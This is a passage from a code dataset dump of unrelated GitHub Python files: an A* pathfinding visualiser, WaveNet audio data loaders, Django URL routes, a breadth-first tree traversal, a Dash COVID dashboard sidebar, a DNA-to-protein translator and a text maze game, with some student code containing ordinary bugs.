wrapper","repo_name":"ilmimris/bagiilmu","sub_path":"01_selenium_from_automation_to_bot/show/bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":4440,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"17590522664","text":"import heapq\nfrom random import random\n\nimport pygame\nimport numpy as np\n\nWHITE = (255, 255, 255)\nBLACK = (0, 0, 0)\nGREY = [128, 128, 128]\nWIDTH = 707\nSIZE = 101\nBLOCK_SIZE = WIDTH // SIZE\nLINE_WIDTH = 2\n\n\nclass Tile: # class for each tile, each tile is defined by an (x,y) coordinate as seperate x and y values\n def __init__(self, x, y):\n self.neighbors = [] # neighbors list to iterate through nerighbors\n self.x = x\n self.y = y\n self.initialize = False\n self.is_block = False\n self.color = WHITE\n\n self.f = 0\n self.g = 100000\n self.h = 0\n self.closed = False\n self.parent = None\n\n def __lt__(self, other):\n return self.f < other.f\n\n def __gt__(self, other):\n return self.f > other.f\n\n def get_color(self): # dont really use this method\n return self.color\n\n def color_in(self, window): # use this method to color in each block\n pygame.draw.rect(window, self.color, [self.x * BLOCK_SIZE, self.y * BLOCK_SIZE, BLOCK_SIZE, BLOCK_SIZE])\n\n def get_position(self): # returns the x and y coordinate, useful for comparing two tiles\n return self.x, self.y\n\n def compare_to(self, t): # compares two tiles, useful for seeing if the tile has already been initialized\n return self.x == t.x and self.y == t.y\n\n def add_neighbors(self, t): # adds neighbor for both tiles that are connected via edge\n for n in self.neighbors: # check all neighbors in list\n if n.compare_to(t):\n return # neighbor in list already, do nothing\n\n self.neighbors.append(t) # add t to neighbors list\n t.neighbors.append(self) # add this node to t node's neighbors list\n\n\nclass BinaryHeap:\n # parent is at i // 2\n # left child is at 2*i + 1\n # right child is at 2*i + 2\n def __init__(self, size):\n self.size = size\n self.index = 0\n self.heap = [None] * size\n\n def get_size(self):\n return self.index\n\n def insert(self, data):\n if self.heap[self.index] is None:\n self.heap[0] = data\n else:\n self.index = self.index + 1\n self.heap[self.index] = data\n self.bubble_up(self.index)\n\n def extract(self) -> Tile:\n minVal = self.heap[0] # take min value\n temp = self.heap[self.index] # swap last value with the first value\n self.heap[self.index] = None\n self.index = self.index - 1\n self.heap[0] = temp\n self.sift_down(0) # perform siftdown\n return minVal\n\n def sift_down(self, i):\n j = i\n L = 2 * i + 1\n r = 2 * i + 2\n\n if L <= self.index: # if index is left most and you say R <= index because index can be at left and this would be false\n if self.heap[L].f < self.heap[j].f:\n temp = self.heap[j].f\n self.heap[j].f = self.heap[L].f\n self.heap[L].f = temp\n self.sift_down(L)\n elif self.heap[r].f < self.heap[j].f:\n temp = self.heap[j].f\n self.heap[j].f = self.heap[r].f\n self.heap[r].f = temp\n self.sift_down(r)\n else:\n return\n\n def print(self):\n for element in self.heap:\n print(element)\n\n def bubble_up(self, i): # i is the index of the last node inserted (size)\n j = i\n p = j // 2\n\n if i > 0: # make sure node is not the root node - root node has no parents to examine\n if self.heap[j].f < self.heap[p].f: # child is less than the parent\n temp = self.heap[p].f # swap child with parent\n self.heap[p].f = self.heap[j].f\n self.heap[j].f = temp\n self.bubble_up(p) # call bubble up on the p index now\n\n\nclass Graph:\n def __init__(self, size):\n self.rows = size\n self.columns = size\n self.vertices = []\n\n def add_edge(self, t1, t2):\n pass\n\n\ndef draw_main(window, grid): # draws the tiles and their color\n window.fill(BLACK)\n for row in grid:\n for t in row:\n t.color_in(window) # color in tile method\n draw_grid_lines(window) # draws the grid lines\n pygame.display.update() # updates pygame\n\n\ndef draw_grid_lines(win): # draws the grid lines that seperate each tile\n for i in range(SIZE): # draws horizontal lines\n pygame.draw.line(win, GREY, [0, BLOCK_SIZE * i], [SIZE * BLOCK_SIZE, BLOCK_SIZE * i],\n LINE_WIDTH) # draws horizontal lines\n for j in range(SIZE): # draws vertical lines\n pygame.draw.line(win, GREY, [BLOCK_SIZE * j, 0], [BLOCK_SIZE * j, SIZE * BLOCK_SIZE],\n LINE_WIDTH) # draw.line draws starting (x0, xf) (y0, yf)\n\n\ndef make_grid(size): # creates the 2D array that stores all the values of tiles\n grid = [[0 for x in range(size)] for y in range(size)] # creates 2d array\n nodes = size * size * [None]\n i = 0\n for x in range(size):\n for y in range(size):\n grid[x][y] = Tile(x, y) # gives each Tile object a unique coordinate\n nodes[i] = grid[x][y]\n i += 1\n return grid\n\n\ndef give_neighbors(grid): # adds neighbors to each tile but does not initialize\n size = len(grid)\n for y in range(size):\n for x in range(size):\n if x < size - 1: # go to second to last tile because will make neighbor with last tile\n grid[x][y].add_neighbors(grid[x + 1][y]) # adds the neighbors right and down to both tiles\n grid[x][y].add_neighbors(grid[x][y - 1])\n if y == size - 1: # at the last row just add neighbors to the right\n grid[x][y].add_neighbors(grid[x + 1][y])\n\n\ndef dfs_block(list_in, x, y): # method for initializing all blocks via dfs\n stack = [] # empty stack\n start = list_in[x][y] # gets coordinate of starting node\n start.is_block = False\n start.initialize = True\n stack.append(start)\n while len(stack) != 0:\n n = stack.pop() # pop the parent\n for t in n.neighbors: # loop iterates for all children of parent\n if not t.initialize:\n t.initialize = True\n r = np.random.randint(0, 10)\n if r < 3: # gives a 30% chance of being a block\n t.is_block = True\n t.color = BLACK\n stack.append(t) # add neighbor to stack\n\n\ndef calc_f(tile: Tile, end):\n # print(tile.x, tile.y)\n tile.h = abs(end[0] - tile.x) + abs(end[1] - tile.y)\n # print(tile.h, tile.x, tile.y, end)\n tile.f = tile.h + tile.g\n\n\ndef a_star(start, end, grid):\n opened = []\n # opened = BinaryHeap(5000)\n heapq.heapify(opened)\n index = 0\n # closed = BinaryHeap(100)\n s = grid[start[0]][start[1]]\n s.g = 0\n heapq.heappush(opened, (0, s))\n # opened.insert(s)\n iteration = 0\n while True:\n iteration += 1\n current = heapq.heappop(opened)[1]\n # current = opened.extract()\n index -= 1\n # print(current.parent)\n if (current is None):\n return\n current.color = \"GREEN\"\n current.closed = True\n\n if current.x == start[0] and current.y == start[1] and iteration != 1:\n for n in current.neighbors:\n if (n.g + 1 < current.g):\n current.parent = n\n return\n\n if current.x == end[0] and current.y == end[1]:\n return opened\n # print(current.neighbors)\n for n in current.neighbors:\n if n.closed or n.is_block or n is None:\n continue\n n.g = current.g + 1\n print(n.g, current.g)\n if n.g > current.g or not n.closed:\n calc_f(n, end)\n n.parent = current\n\n if not n.closed:\n index += 1\n # opened.insert(n)\n heapq.heappush(opened, (n.f, n))\n\n\ndef draw_path(start, end, grid):\n current: Tile = grid[end[0]][end[1]]\n while True:\n if current is None:\n return\n if (current == grid[start[0]][start[1]]):\n return\n current.color = \"RED\"\n current = current.parent\n # print(current.g, current.h)\n # print(current.neighbors)\n\n\ndef main():\n pygame.init()\n game_window = pygame.display.set_mode((WIDTH, WIDTH))\n pygame.display.set_caption(\"A* Path Finding Algo\")\n\n my_grid = make_grid(SIZE) # makes [100][100] and populates with tiles\n give_neighbors(my_grid) # adds neighbors to tiles\n\n dfs_block(my_grid, 50, 50) # makes tiles blocks or not blocks at starting block\n\n game_exit = False\n\n start = (int(random() * 100), int(random() * 100))\n end = (int(random() * 100), int(random() * 100))\n # start = (50, 50)\n # end = (51, 75)\n # print(start, end)\n\n a_star(start, end, my_grid)\n\n draw_path(start, end, my_grid)\n\n my_grid[start[0]][start[1]].color = \"BLUE\"\n my_grid[end[0]][end[1]].color = \"BLUE\"\n\n while not game_exit:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n game_exit = True\n draw_main(game_window, my_grid) # draws the game window\n\n print(\"hello world\")\n\n\n# TODO make sure start and end arent blocked\n# TODO convert to our own heap implementation\n# TODO comments on A* algorithm\n# TODO better visualizations\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"ttenneb/CS440-Homework1","sub_path":"Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":9525,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"7718246812","text":"\"\"\"\n\"\"\"\nfrom __future__ import division\n\nimport math\nimport os\nimport warnings\n\nimport numpy as np\nimport scipy.io.wavfile\nimport scipy.signal\nfrom picklable_itertools import cycle\nfrom picklable_itertools.extras import partition_all\nfrom tqdm import tqdm\n\n\n# TODO: make SACRED ingredient.\ndef one_hot(x):\n return np.eye(256, dtype='uint8')[x.astype('uint8')]\n\n\ndef fragment_indices(full_sequences, fragment_length, batch_size, fragment_stride, nb_output_bins):\n for seq_i, sequence in enumerate(full_sequences):\n # range_values = np.linspace(np.iinfo(sequence.dtype).min, np.iinfo(sequence.dtype).max, nb_output_bins)\n # digitized = np.digitize(sequence, range_values).astype('uint8')\n for i in range(0, sequence.shape[0] - fragment_length, fragment_stride):\n yield seq_i, i\n\n\ndef select_generator(set_name, random_train_batches, full_sequences, fragment_length, batch_size, fragment_stride,\n nb_output_bins, randomize_batch_order, _rnd):\n if random_train_batches and set_name == 'train':\n bg = random_batch_generator\n else:\n bg = batch_generator\n return bg(full_sequences, fragment_length, batch_size, fragment_stride, nb_output_bins, randomize_batch_order, _rnd)\n\n\ndef batch_generator(full_sequences, fragment_length, batch_size, fragment_stride, nb_output_bins, randomize_batch_order, _rnd):\n indices = list(fragment_indices(full_sequences, fragment_length, batch_size, fragment_stride, nb_output_bins))\n if randomize_batch_order:\n _rnd.shuffle(indices)\n\n batches = cycle(partition_all(batch_size, indices))\n for batch in batches:\n if len(batch) < batch_size:\n continue\n yield np.array(\n [one_hot(full_sequences[e[0]][e[1]:e[1] + fragment_length]) for e in batch], dtype='uint8'), np.array(\n [one_hot(full_sequences[e[0]][e[1] + 1:e[1] + fragment_length + 1]) for e in batch], dtype='uint8')\n\n\ndef random_batch_generator(full_sequences, fragment_length, batch_size, fragment_stride, nb_output_bins,\n randomize_batch_order, _rnd):\n lengths = [x.shape[0] for x in full_sequences]\n nb_sequences = len(full_sequences)\n while True:\n sequence_indices = _rnd.randint(0, nb_sequences, batch_size)\n batch_inputs = []\n batch_outputs = []\n for i, seq_i in enumerate(sequence_indices):\n l = lengths[seq_i]\n offset = np.squeeze(_rnd.randint(0, l - fragment_length, 1))\n batch_inputs.append(full_sequences[seq_i][offset:offset + fragment_length])\n batch_outputs.append(full_sequences[seq_i][offset + 1:offset + fragment_length + 1])\n yield one_hot(np.array(batch_inputs, dtype='uint8')), one_hot(np.array(batch_outputs, dtype='uint8'))\n\n\ndef generators(dirname, desired_sample_rate, fragment_length, batch_size, fragment_stride, nb_output_bins,\n learn_all_outputs, use_ulaw, randomize_batch_order, _rnd, random_train_batches):\n fragment_generators = {}\n nb_examples = {}\n for set_name in ['train', 'test']:\n set_dirname = os.path.join(dirname, set_name)\n full_sequences = load_set(desired_sample_rate, set_dirname, use_ulaw)\n fragment_generators[set_name] = select_generator(set_name, random_train_batches, full_sequences,\n fragment_length,\n batch_size, fragment_stride, nb_output_bins,\n randomize_batch_order, _rnd)\n nb_examples[set_name] = int(sum(\n [len(range(0, x.shape[0] - fragment_length, fragment_stride)) for x in\n full_sequences]) / batch_size) * batch_size\n\n return fragment_generators, nb_examples\n\n\ndef generators_vctk(dirname, desired_sample_rate, fragment_length, batch_size, fragment_stride, nb_output_bins,\n learn_all_outputs, use_ulaw, test_factor, randomize_batch_order, _rnd, random_train_batches):\n fragment_generators = {}\n nb_examples = {}\n speaker_dirs = os.listdir(dirname)\n train_full_sequences = []\n test_full_sequences = []\n for speaker_dir in speaker_dirs:\n full_sequences = load_set(desired_sample_rate, os.path.join(dirname, speaker_dir), use_ulaw)\n nb_examples_train = int(math.ceil(len(full_sequences) * (1 - test_factor)))\n train_full_sequences.extend(full_sequences[0:nb_examples_train])\n test_full_sequences.extend(full_sequences[nb_examples_train:])\n\n for set_name, set_sequences in zip(['train', 'test'], [train_full_sequences, test_full_sequences]):\n fragment_generators[set_name] = select_generator(set_name, random_train_batches, full_sequences,\n fragment_length,\n batch_size, fragment_stride, nb_output_bins,\n randomize_batch_order, _rnd)\n nb_examples[set_name] = int(sum(\n [len(range(0, x.shape[0] - fragment_length, fragment_stride)) for x in\n full_sequences]) / batch_size) * batch_size\n\n return fragment_generators, nb_examples\n\n\ndef load_set(desired_sample_rate, set_dirname, use_ulaw):\n ulaw_str = '_ulaw' if use_ulaw else ''\n cache_fn = os.path.join(set_dirname, 'processed_%d%s.npy' % (desired_sample_rate, ulaw_str))\n if os.path.isfile(cache_fn):\n full_sequences = np.load(cache_fn)\n else:\n file_names = [fn for fn in os.listdir(set_dirname) if fn.endswith('.wav')]\n full_sequences = []\n for fn in tqdm(file_names):\n sequence = process_wav(desired_sample_rate, os.path.join(set_dirname, fn), use_ulaw)\n full_sequences.append(sequence)\n np.save(cache_fn, full_sequences)\n\n return full_sequences\n\n\ndef process_wav(desired_sample_rate, filename, use_ulaw):\n with warnings.catch_warnings():\n warnings.simplefilter(\"error\")\n channels = scipy.io.wavfile.read(filename)\n file_sample_rate, audio = channels\n audio = ensure_mono(audio)\n audio = wav_to_float(audio)\n if use_ulaw:\n audio = ulaw(audio)\n audio = ensure_sample_rate(desired_sample_rate, file_sample_rate, audio)\n audio = float_to_uint8(audio)\n return audio\n\n\ndef ulaw(x, u=255):\n x = np.sign(x) * (np.log(1 + u * np.abs(x)) / np.log(1 + u))\n return x\n\n\ndef float_to_uint8(x):\n x += 1.\n x /= 2.\n uint8_max_value = np.iinfo('uint8').max\n x *= uint8_max_value\n x = x.astype('uint8')\n return x\n\n\ndef wav_to_float(x):\n try:\n max_value = np.iinfo(x.dtype).max\n min_value = np.iinfo(x.dtype).min\n except:\n max_value = np.finfo(x.dtype).max\n min_value = np.iinfo(x.dtype).min\n x = x.astype('float64', casting='safe')\n x -= min_value\n x /= ((max_value - min_value) / 2.)\n x -= 1.\n return x\n\n\ndef ulaw2lin(x, u=255.):\n max_value = np.iinfo('uint8').max\n min_value = np.iinfo('uint8').min\n x = x.astype('float64', casting='safe')\n x -= min_value\n x /= ((max_value - min_value) / 2.)\n x -= 1.\n x = np.sign(x) * (1 / u) * (((1 + u) ** np.abs(x)) - 1)\n x = float_to_uint8(x)\n return x\n\ndef ensure_sample_rate(desired_sample_rate, file_sample_rate, mono_audio):\n if file_sample_rate != desired_sample_rate:\n mono_audio = scipy.signal.resample_poly(mono_audio, desired_sample_rate, file_sample_rate)\n return mono_audio\n\n\ndef ensure_mono(raw_audio):\n \"\"\"\n Just use first channel.\n \"\"\"\n if raw_audio.ndim == 2:\n raw_audio = raw_audio[:, 0]\n return raw_audio\n\n","repo_name":"basveeling/wavenet","sub_path":"dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":7669,"program_lang":"python","lang":"en","doc_type":"code","stars":1059,"dataset":"github-code","pt":"77"} +{"seq_id":"4125267613","text":"from django.urls import path\nfrom .views import (\n home, \n personList,\n newPerson,\n updatePerson,\n vehicleList,\n newVehicle,\n updateVehicle,\n rotaryMotion,\n newRotaryMotion,\n updateRotaryMotion,\n monthly,\n newMonthly,\n updateMonthly,\n rotaryMonthly,\n newRotaryMonthly,\n updateRotaryMonthly,\n )\n\n\nurlpatterns = [\n path('', home, name='core_home'),\n #Person URLs\n path('person_list/', personList, name='core_persons_list'),\n path('person_new/', newPerson, name='core_persons_new'),\n path('person_new//', updatePerson, name='core_persons_update'),\n #Vehicle URLs\n path('vehicle_list/', vehicleList, name='core_vehicles_list'),\n path('vehicle_new/', newVehicle, name='core_vehicles_new'),\n path('vehicle_update//', updateVehicle, name='core_vehicle_update'),\n #Rotary Motion URLs\n path('rotaryMotion_list/', rotaryMotion, name='core_rotaryMotion_list'),\n path('rotaryMotion_new/', newRotaryMotion, name='core_rotaryMotion_new'),\n path('rotaryMotion_update//', updateRotaryMotion, name='core_rotaryMotion_update'),\n #Monthly URLs\n path('monthly_list/', monthly, name='core_monthly_list'),\n path('monthly_new/', newMonthly, name='core_monthly_new'),\n path('monthly_update//', updateMonthly, name='core_monthly_update'),\n #Rotary Monthly URLs\n path('rotaryMonthly_list/', rotaryMonthly, name='core_rotaryMonthly_list'),\n path('rotaryMonthly_new/', newRotaryMonthly, name='core_rotaryMonthly_new'),\n path('rotaryMonthly_update//', updateRotaryMonthly, name='core_rotaryMonthly_update'),\n]\n","repo_name":"thiagomurtinho/djangoParking","sub_path":"core/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1615,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"21661132887","text":"class Node:\r\n def __init__(self, info): \r\n self.info = info \r\n self.left = None \r\n self.right = None \r\n self.level = None \r\n\r\n def __str__(self):\r\n return str(self.info) \r\n\r\nclass BinarySearchTree:\r\n def __init__(self): \r\n self.root = None\r\n\r\n def create(self, val): \r\n if self.root == None:\r\n self.root = Node(val)\r\n else:\r\n current = self.root\r\n \r\n while True:\r\n if val < current.info:\r\n if current.left:\r\n current = current.left\r\n else:\r\n current.left = Node(val)\r\n break\r\n elif val > current.info:\r\n if current.right:\r\n current = current.right\r\n else:\r\n current.right = Node(val)\r\n break\r\n else:\r\n break\r\n\r\n\"\"\"\r\nNode is defined as\r\nself.left (the left child of the node)\r\nself.right (the right child of the node)\r\nself.info (the value of the node)\r\n\"\"\"\r\nfrom collections import deque\r\ndef levelOrder(root):\r\n if root is None:\r\n print(\"\")\r\n return\r\n myLevel = \"\"\r\n #breadth first search (i.e. make queue)\r\n queue = deque([root])\r\n while queue:\r\n #remove from queue\r\n node = queue.popleft()\r\n #print\r\n myLevel += node.__str__() + \" \"\r\n \r\n #add its children to queue\r\n if node.left is not None:\r\n queue.append(node.left)\r\n if node.right is not None:\r\n queue.append(node.right)\r\n print(myLevel)\r\n \r\ntree = BinarySearchTree()\r\nt = int(input())\r\n\r\narr = list(map(int, input().split()))\r\n\r\nfor i in range(t):\r\n tree.create(arr[i])\r\n\r\nlevelOrder(tree.root)","repo_name":"chrisrobles/python3-cheatsheet","sub_path":"data structures/breadth.py","file_name":"breadth.py","file_ext":"py","file_size_in_byte":1862,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"23717683667","text":"#Name: Joshua Correa, Nathan Heidari\n#Date: 02/14/23\n#Brief Description: Welcome to Maze Solver! Do you have what it takes to solve these diffuclt mazes? Give it your best shot!\n\nimport check_input\nimport random\n\ndef read_maze():\n '''This function has no input rather it is a function that reads a maze.txt file. The maze file is selected from the Maze folder and is iterated through adding each row. The output for this function is a 2D list of containing each row of the maze.'''\n level = random.randint(1, 5) #picks a random maze to play\n file = open(f'Mazes/maze{level}.txt') #opens the random maze\n maze = [] #everything below is appending each row of the maze into a list creating a 2D List\n for row in file:\n list = []\n for item in row:\n if item != '' and item != '\\n':\n list.append(item)\n print(row)\n maze.append(list)\n file.close()\n return maze\n \ndef find_start(maze):\n '''This function takes the 2D maze list as an input. The maze is iterated through until it finds the S item which is your starting point. The output is a list with two items: the x and y value for the S.'''\n loc = [] #this function finds S in the maze 2D list and saves its corrdinates\n for row in maze:\n for item in row:\n if (item == 'S'):\n loc.append(maze.index(row) + 1) #x coordinate\n loc.append(row.index(item) + 1) #y coordinate\n return loc\n\ndef display_maze(maze, loc):\n '''This function uses the maze 2D list and the list with the x and y value for the Start location. The function iteraties through each row, makes it a string, and then repeats it. The output is the full maze and returns nothing.'''\n maze[loc[0]][loc[1]] = 'X' #makes an X appear where ever the current loc cord is\n for row in maze: #prints out the maze line by line\n line = ''\n for item in row:\n line += item\n print(line)\n \ndef main():\n '''This function takes no inputs and is a staging ground for all other functions. The function moves the player and checks the conditions for winning. The function also helps with the mystery maze (but its a secret don't tell anyone).'''\n on = True #turns on the game\n print('-Maze Solver-')\n maze = read_maze()\n loc = find_start(maze)\n loc[0] -= 1 #accurately displays x and y cord\n loc[1] -= 1\n origin_x, origin_y = loc[0], loc[1] #saves starting point\n while (on == True):\n if (maze[origin_x][origin_y] != 'S'): #consistantly displays the start point\n maze[origin_x][origin_y] = 'S'\n display_maze(maze, loc)\n print('1. Go North')\n print('2. Go South')\n print('3. Go East')\n print('4. Go West')\n choice = check_input.get_int_range('Enter choice: ', 1, 4) #checks your choice for movement\n \n if (choice == 2):\n if (maze[loc[0] + 1][loc[1]] == '*'): #can't walk through walls position not updated\n print('You cannot move there.')\n continue\n \n elif (maze[loc[0]+1][loc[1]] == 'F') and (len(maze[0]) == 3): #mysterymaze shenanigans\n print('You didn\\'t think it would be that easy did you?')\n file = open('Mazes/mysterymaze.txt')\n maze = []\n for row in file:\n list = []\n for item in row:\n if item != '' and item != '\\n':\n list.append(item)\n maze.append(list)\n loc = find_start(maze)\n loc[0] -= 1\n loc[1] -= 1\n origin_x, origin_y = loc[0], loc[1]\n \n elif (maze[loc[0] + 1][loc[1]] == 'F'): #when the player reaches the end the game ends\n maze[loc[0]][loc[1]] = ' '\n loc[0] += 1\n maze[loc[0]][loc[1]] = 'X'\n display_maze(maze, loc)\n print('Congratulations! You solved the maze.')\n break #turns off the game\n \n elif (maze[loc[0] + 1][loc[1]] == '?'): #Secrets you can collect! How Exciting!\n maze[loc[0]][loc[1]] = ' '\n loc[0] += 1\n print('Congrats you found the secret! Your so cool!')\n \n else: #moves player and makes sure to delete the previous position X\n maze[loc[0]][loc[1]] = ' '\n loc[0] += 1\n \n elif (choice == 1):\n if (maze[loc[0] - 1][loc[1]] == '*'):\n print('You cannot move there.')\n continue\n \n elif (maze[loc[0] - 1][loc[1]] == 'F'):\n maze[loc[0]][loc[1]] = ' '\n loc[0] -= 1\n maze[loc[0]][loc[1]] = 'X'\n display_maze(maze, loc)\n print('Congratulations! You solved the maze.')\n break\n \n elif (maze[loc[0] - 1][loc[1]] == '?'):\n maze[loc[0]][loc[1]] = ' '\n loc[0] -= 1\n print('Congrats you found the secret! Your so cool!')\n \n else:\n maze[loc[0]][loc[1]] = ' '\n loc[0] -= 1\n \n elif (choice == 3):\n if (maze[loc[0]][loc[1] + 1] == '*'):\n print('You cannot move there.')\n continue\n \n elif (maze[loc[0]][loc[1] + 1] == 'F'):\n maze[loc[0]][loc[1]] = ' '\n loc[1] += 1\n maze[loc[0]][loc[1]] = 'X'\n display_maze(maze, loc)\n print('Congratulations! You solved the maze.')\n break\n \n elif (maze[loc[0]][loc[1] + 1] == '?'):\n maze[loc[0]][loc[1]] = ' '\n loc[1] += 1\n print('Congrats you found the secret! Your so cool!')\n \n else:\n maze[loc[0]][loc[1]] = ' '\n loc[1] += 1\n \n elif (choice == 4):\n if (maze[loc[0]][loc[1] - 1] == '*'):\n print('You cannot move there.')\n continue\n \n elif (maze[loc[0]][loc[1] - 1] == 'F'):\n maze[loc[0]][loc[1]] = ' '\n loc[1] -= 1\n maze[loc[0]][loc[1]] = 'X'\n display_maze(maze, loc)\n print('Congratulations! You solved the maze.')\n break\n \n elif (maze[loc[0]][loc[1] - 1] == '?'):\n maze[loc[0]][loc[1]] = ' '\n loc[1] -= 1\n print('Congrats you found the secret! Your so cool!')\n \n else:\n maze[loc[0]][loc[1]] = ' '\n loc[1] -= 1\nmain()","repo_name":"jolly-yolk/CECS-277","sub_path":"4 - FileIO/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5964,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"19964299647","text":"import dash\nimport dash_bootstrap_components as dbc\nimport dash_core_components as dcc\nimport dash_html_components as html\nfrom database import transforms\nimport pandas as pd\n\n# load data\ndf_con = transforms.df_con\ndf_rec = transforms.df_rec\ndf_fat = transforms.df_fat\ndf_act = transforms.df_act\n\n# add (All) to show world data\ncountries = ['(All)'] + df_con['Country/Region'].dropna().unique().tolist()\nstates = ['(All)'] + df_con['Province/State'].dropna().unique().tolist()\n\n# create country_buttons to sort country buttons\ncountry_cases = {}\nfor country in countries[1:]:\n country_cases[country] = df_con[df_con['Country/Region']==country].iloc[:, 4:].sum()[-1]\n\ndff = pd.DataFrame(country_cases.items())\ndff.columns = ['Country/Region', 'Cases']\ndff = dff.sort_values(by=['Cases'], ascending=False)\ncountry_buttons = dff['Country/Region']\n\n# the style arguments for the sidebar. We use position:fixed and a fixed width\nSIDEBAR_STYLE = {\n \"position\": \"fixed\",\n \"overflow-y\": \"scroll\", # add scroll bar\n \"top\": \"5rem\",\n \"left\": 0,\n \"bottom\": 0,\n \"width\": \"16rem\",\n \"padding\": \"2rem 1rem\",\n \"background-color\": \"#f8f9fa\",\n 'display':'inline-block',\n}\n\ndef create_country_button(country):\n return html.Div([\n html.Div(id=country+'-name', children = [\n country,\n ], style={\n 'textAlign':'left',\n 'display':'table-cell',\n 'vertical-align': 'middle',\n 'padding': 10,\n }),\n html.Div(\n dff[dff['Country/Region']==country]['Cases']\n , style={\n 'textAlign':'right',\n 'display':'table-cell',\n 'vertical-align': 'middle',\n 'padding': 10,\n }),\n ], style={\n 'display': 'table',\n 'border':'1px solid',\n 'border-radius': '3px',\n 'height': '30px',\n 'width': '100%',\n 'margin-bottom': 10,\n })\n\n\nlayout = html.Div([\n\n html.Div([\n html.Div(id='global-name', children = [\n \"Global\",\n ], style={\n 'textAlign':'left',\n 'display':'table-cell',\n 'vertical-align': 'middle',\n 'padding': 10,\n }),\n html.Div([\n df_con.iloc[:, 4:].sum()[-1]\n ], style={\n 'textAlign':'right',\n 'display':'table-cell',\n 'vertical-align': 'middle',\n 'padding': 10,\n }),\n ], style={\n 'display': 'table',\n 'border':'1px solid',\n 'border-radius': '3px',\n 'height': '45px',\n 'width': '100%',\n }),\n\n html.Hr(),\n\n html.Div(\n [create_country_button(country) for country in country_buttons]\n ),\n\n], style=SIDEBAR_STYLE)\n","repo_name":"joomyung/covid19","sub_path":"layout/sidebar.py","file_name":"sidebar.py","file_ext":"py","file_size_in_byte":2808,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"4470730860","text":"# population of botswana\nbotswana = 3000000\n# population of reunion\nreunion = 95000\n# the year we are in \nyear = 2022\n\n# while loop will continue until reunion is greater than botswana \nwhile reunion < botswana:\n # botswana is decreasing by 0.96\n botswana = botswana * 0.96\n # reunion is increasing by 1.09\n reunion = reunion * 1.09\n # it is increasing\n year += 1\n\n# hence it will print the year when reunion is greater than botswana\nprint(year)\n\n","repo_name":"Salman-Noor1/game.py","sub_path":"population.py","file_name":"population.py","file_ext":"py","file_size_in_byte":465,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"70678135290","text":"#! C:\\Users\\joris\\AppData\\Local\\Programs\\Python\\Python38\\python.exe\n\n\ndic_P = {\n 'ATA':'I', 'ATC':'I', 'ATT':'I', 'ATG':'M',\n 'ACA':'T', 'ACC':'T', 'ACG':'T', 'ACT':'T',\n 'AAC':'N', 'AAT':'N', 'AAA':'K', 'AAG':'K',\n 'AGC':'S', 'AGT':'S', 'AGA':'R', 'AGG':'R',\n 'CTA':'L', 'CTC':'L', 'CTG':'L', 'CTT':'L',\n 'CCA':'P', 'CCC':'P', 'CCG':'P', 'CCT':'P',\n 'CAC':'H', 'CAT':'H', 'CAA':'Q', 'CAG':'Q',\n 'CGA':'R', 'CGC':'R', 'CGG':'R', 'CGT':'R',\n 'GTA':'V', 'GTC':'V', 'GTG':'V', 'GTT':'V',\n 'GCA':'A', 'GCC':'A', 'GCG':'A', 'GCT':'A',\n 'GAC':'D', 'GAT':'D', 'GAA':'E', 'GAG':'E',\n 'GGA':'G', 'GGC':'G', 'GGG':'G', 'GGT':'G',\n 'TCA':'S', 'TCC':'S', 'TCG':'S', 'TCT':'S',\n 'TTC':'F', 'TTT':'F', 'TTA':'L', 'TTG':'L',\n 'TAC':'Y', 'TAT':'Y', 'TAA':'_', 'TAG':'_',\n 'TGC':'C', 'TGT':'C', 'TGA':'_', 'TGG':'W'}\n\n# Read file\ndef read_file(filename):\n filehandle = open(filename)\n for line in filehandle:\n if line.startswith('>'):\n header = line.rstrip()\n sequence = ''\n else:\n sequence += line.rstrip()\n filehandle.close()\n\n return sequence, header\n\ndef check_if_nuc(sequence):\n nuc_sequence = True\n for char in sequence:\n if char not in 'ATGC':\n nuc_sequence = False\n break\n return nuc_sequence\n\ndef make_protein(sequence, start_position):\n protein_str = ''\n for position in range(start_position, len(sequence), 3):\n triplet = sequence[position:position+3]\n if len(triplet) == 3:\n protein_str += dic_P[triplet]\n return protein_str\n\ndef write_outputfile(protein_str, outputfilehandle, header):\n print(header, file = outputfilehandle)\n for position in range(0, len(protein_str), 70):\n print(protein_str[position:position+70], file = outputfilehandle)\n print(' ', file=outputfilehandle)\n\n\ndef main():\n filename = input('Geef hier de filenaam weer gescheiden met een spatie: ')\n filelist = filename.split()\n\n outputfilename = input('Geef hier de naam van het outputbestand: ')\n outputfilehandle = open(outputfilename, 'w')\n\n start_position = input(\"Geef hier de startpositie van de eerste codon aan: \")\n start_position = int(start_position) - 1\n\n for filename in filelist:\n sequence, header = read_file(filename)\n nuc_sequence = check_if_nuc(sequence)\n if nuc_sequence == True:\n protein_str = make_protein(sequence, start_position)\n write_outputfile(protein_str, outputfilehandle, header)\n else:\n print('Warning!, one or multiple files contain no nucleotides and has not been writen to the outputfile.')\n outputfilehandle.close()\n\nmain()\n","repo_name":"einsteinium299/bioinformatics","sub_path":"Year_1_Q1/script5.py","file_name":"script5.py","file_ext":"py","file_size_in_byte":2767,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"10618723236","text":"#!/usr/bin/env python\nimport numpy as np\nfrom random import sample\nimport pickle\nfrom tqdm.autonotebook import tqdm\n\nimport torch\nfrom torch import nn, from_numpy\nfrom torch.autograd import Variable\n\n\nfrom .autoencoder import Autoencoder\nfrom .utils import kl_divergence, make_P\n\nfrom 